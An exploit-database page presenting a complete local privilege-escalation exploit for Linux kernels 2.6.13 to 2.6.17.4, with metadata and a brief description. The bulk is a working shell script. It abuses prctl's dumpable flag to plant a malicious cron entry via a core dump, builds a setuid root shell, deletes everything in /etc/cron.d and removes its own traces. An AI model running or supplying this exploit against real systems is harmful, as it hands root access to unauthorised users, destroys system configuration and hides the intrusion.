header-logo
Suggest Exploit
vendor:
Linux Kernel
by:
Sunix
7.2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: Linux Kernel
Affected Version From: 2.6.13
Affected Version To: 2.6.17.4, 2.6.9-22.ELsmp
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Intel(R) Xeon(TM) CPU 3.20GHz
2006

PRCTL local root exp

This exploit is a local privilege escalation vulnerability in the Linux kernel. It affects versions 2.6.13 to 2.6.17.4 and 2.6.9-22.ELsmp. It was tested on Intel(R) Xeon(TM) CPU 3.20GHz with kernel 2.6.9-22.ELsmp. The exploit uses the prctl() system call to set the dumpable flag to 2, which allows the attacker to create a core dump file of the process. The attacker then creates a cron job which runs a setuid shell, allowing the attacker to gain root privileges.

Mitigation:

The vulnerability can be mitigated by applying the appropriate security patches.
Source

Exploit-DB raw data:

#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested on Intel(R) Xeon(TM) CPU 3.20GHz
# kernel 2.6.9-22.ELsmp
# maybe others ...
# Tx to drayer & RoMaNSoFt for their clear code...
#
# zmia23@yahoo.com


cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";

int main() { 
    int child;
    struct rlimit corelimit;
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);
    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }
    kill(child, SIGSEGV);
    sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

# milw0rm.com [2006-07-14]

Navigation

Suggest Exploit

Services By CQR